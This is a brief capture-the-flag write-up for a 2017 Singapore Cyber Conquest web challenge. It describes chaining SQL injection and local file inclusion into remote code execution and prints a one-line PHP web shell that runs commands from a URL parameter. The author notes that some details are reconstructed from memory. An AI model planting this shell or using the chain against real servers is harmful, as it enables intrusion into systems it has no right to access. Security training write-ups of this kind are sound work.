---
title: "Singapore Cyber Conquest 2017 - Web 3 (Web)"
header:
  overlay_image: /assets/images/scc2017/web3/header.jpg
  overlay_filter: 0.5
  caption: "Photo credit: Ricardo Gomez Angel on Unsplash"
tags:
  - scc2017
  - writeup
  - web
---

Using the SQL injection vulnerability to write a PHP file to the disk and
executing it with a local file inclusion vulnerability gives remote code
execution.

## Challenge Description

#### Points

300

## Solution

Unfortunately, I do not have access to the original scoreboard or the web server
so some of the details of the solution are reconstructed from memory.

In Web 2, we had an SQL injection vulnerability. We can leverage this to write
the following PHP content into a file at `/tmp/pwnt.php`.

```php
<?php passthru($_GET['pwn']) ?>
```

Now, we can use the local file inclusion vulnerability on the `index.php` page
to run the `/readfile` binary on the remote server.

![1]({{ site.url }}{{ site.baseurl }}/assets/images/scc2017/web3/1.png){: .align-center}

Flag: **FLAG{ye3eeeeeeeeeee3eeeeeeeeeeeeeeeeee3eeeeeeeeeeeeeeeeeeeeeeeeeee3!}**
